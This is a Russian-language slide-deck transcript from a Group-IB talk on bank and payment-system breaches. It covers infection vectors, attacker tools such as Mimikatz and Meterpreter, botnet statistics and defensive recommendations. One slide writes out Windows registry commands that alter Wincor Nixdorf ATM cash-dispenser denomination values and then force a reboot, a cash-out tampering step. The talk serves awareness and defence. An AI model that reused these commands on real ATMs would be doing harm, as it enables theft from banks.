Документ описывает различные инциденты кибербезопасности, включая взлом платежных систем, кражу средств и использование вредоносного ПО для доступа к критическим системам. Также упоминаются методы повышения привилегий и манипуляции с наличными средствами. В заключение подчеркивается важность подготовки организаций к потенциальным угрозам и необходимость использования современных методов анализа инцидентов.

1. Никита Кислицин,
Group-IB

2. 2
Происходят плохие вещи
— Взломали платежную систему, украли прибыль за 3 года
— Взломали банк, продали доллары по 55, через 17 минут купили по 65
— Взломали банк, получили доступ к сети с банкоматами, вынули наличных на 20
млн. руб.
— Взломали сеть POS-терминалов торговой сети, украли 70 млн. карт
— Взломали крупный интернет-сервис, слили базу и исходники

3. 3
1. Заражение хостов в инфраструктуре
— Социальная инженерия, вредоносные вложения
* CVE-2012-2539, CVE-2012-0158, CVE-2015-5119, etc.
* Очень-важный-договор.scr
* Реквизиты.doc.cpl
— Drive-By-Download
* Niterix, Spartanб Angler, SunDown, etc.
* Форумы и «Прогружу ваш софт»

4. 4
2. Понимание того, куда попали боты
#!/usr/bin/python
import os
from bulkwhois.shadowserver import BulkWhoisShadowserver
iplist_file = ‘ip.txt’
path = os.path.dirname(os.path.abspath(__file__))
bulk_whois = BulkWhoisShadowserver()
iplist = []
with open(os.path.join(path, iplist_file)) as f:
for line in f:
iplist.append(line.strip())
result = bulk_whois.lookup_ips(iplist)

5. 5
3. Поднятие привилегий и доступ к нужным хостам/приложениям
- Mimikatz
- Caen& Abel
- Linux/Ssemgrvd sshd Backdoor
- RDPDoor, Poison Ivy
- Amyy Admin, Team Viewer
- Meterpreter
- SoftPerfect, etc.

6. 6
4. Вывод денег
REG ADD “HKEY_LOCAL_MACHINESOFTWARE
Wincor
NixdorfProTopasCurrentVersionLYNXPAR
CASH_DISPENSER”
/v VALUE_1 /t REG_SZ
/d “5000” /f
REG ADD “HKEY_LOCAL_MACHINESOFTWARE
Wincor
NixdorfProTopasCurrentVersionLYNXPAR
CASH_DISPENSER”
/v VALUE_2 /t REG_SZ
/d “1000” /f
REG ADD “HKEY_LOCAL_MACHINESOFTWARE
Wincor
NixdorfProTopasCurrentVersionLYNXPAR
CASH_DISPENSER”
REG ADD “HKEY_LOCAL_MACHINESOFTWARE
Wincor
NixdorfProTopasCurrentVersionLYNXPAR
CASH_DISPENSER”
/v VALUE_4 /t REG_SZ
/d “100” /f
REG ADD “HKEY_LOCAL_MACHINESOFTWARE
Wincor
NixdorfProTopasCurrentVersionLYNXPAR
CASH_DISPENSER”
/v VALUE_1 /t REG_SZ
/d “100” /f
REG ADD “HKEY_LOCAL_MACHINESOFTWARE
Wincor
NixdorfProTopasCurrentVersionLYNXPAR
CASH_DISPENSER”
/v VALUE_4 /t REG_SZ
/d “5000” /f
shutdown -r -t 0 –f

7. 7

8. 8

9. ANUNAK
• 200 ботов
• 1 млрд рублей хищений

14. CORKOW
• 400.000 ботов
• Сумма балансов ботов:
> 6500 млн. рублей
• Направленные атаки на
банковский сектор

15. 15

16. 16

17. t d s . g r o u p - i b . r u
86%компьютеров в ботнетах имеют
установленное антивирусное
средство
1.5Mкомпьютеров в России
заразил ботнет Carberp
Использование антивирусов на
зараженных компьютерах
8%
14%
16%
7%
44%
11%
Нет антивируса
Kaspersky
Microsoft
Symantec
Dr Web
Другие
17

20. 20
• 1,789/127 магазинов
в США/Канаде
• 127/37 складов
в США/Канаде
• 361,000 сотрудников
• Target.com

21. 21

22. 22

23. 23

24. 24

25. 25

26. 26

27. 27

28. 28

29. Brian Dye
Symantec Senior VP:
«Antivirus
is dead»*
* WSJ, MAY-14
29

30. Выявление всех
актуальных угроз,
включая мобильные
Выгодный аутсорс
анализа сетевых
инцидентов
в CERT-GIB
Ежедневные
обновления правил
и сигнатур
Анализ полосы до 5
Гбит/сек компактным
1U-решением

31. Выявление всех
актуальных угроз,
включая мобильные
Выгодный аутсорс
анализа сетевых
инцидентов
в CERT-GIB
Ежедневные
обновления правил
и сигнатур
Анализ полосы до 5
Гбит/сек компактным
1U-решением

32. Выявление всех
актуальных угроз,
включая мобильные
Выгодный аутсорс
анализа сетевых
инцидентов
в CERT-GIB
Ежедневные
обновления правил
и сигнатур
Анализ полосы до 5
Гбит/сек компактным
1U-решением

33. Выявление всех
актуальных угроз,
включая мобильные
Выгодный аутсорс
анализа сетевых
инцидентов
в CERT-GIB
Ежедневные
обновления правил
и сигнатур
Анализ полосы до 5
Гбит/сек компактным
1U-решением

34. Выявление всех
актуальных угроз,
включая мобильные
Выгодный аутсорс
анализа сетевых
инцидентов
в CERT-GIB
Ежедневные
обновления правил
и сигнатур
Анализ полосы до 5
Гбит/сек компактным
1U-решением

35. Выявление всех
актуальных угроз,
включая мобильные
Выгодный аутсорс
анализа сетевых
инцидентов
в CERT-GIB
Ежедневные
обновления правил
и сигнатур
Анализ полосы до 5
Гбит/сек компактным
1U-решением

36. 36
ИБ-вендоры предлагают купить новое
(теперь-то действенное!) решение проблемы
— Мой super advanced anti-APT лучше твоего, у меня песочница и классификатор на
тыщу фич
— Твоя песочница уже не торт, мы используем чистую математику и чистую магию:
детектируем все, не анализируя ничего

37. 37

38. 38
Что надо было делать до инцидентов
— В организации процессов исходить из того, что компьютер(ы) в сети уже заражены
— Хорошо и глубоко писать логи по соединениям (netflow, http-log, passivedns)
— Объективно изучать пользовательский трафик, вместо того чтобы ставить
очередное хостовое решение
— Довериться вендорам, которые знают и постоянно изучают реальные угрозы в
вашем регионе

39. Никита Кислицин,
Group-IB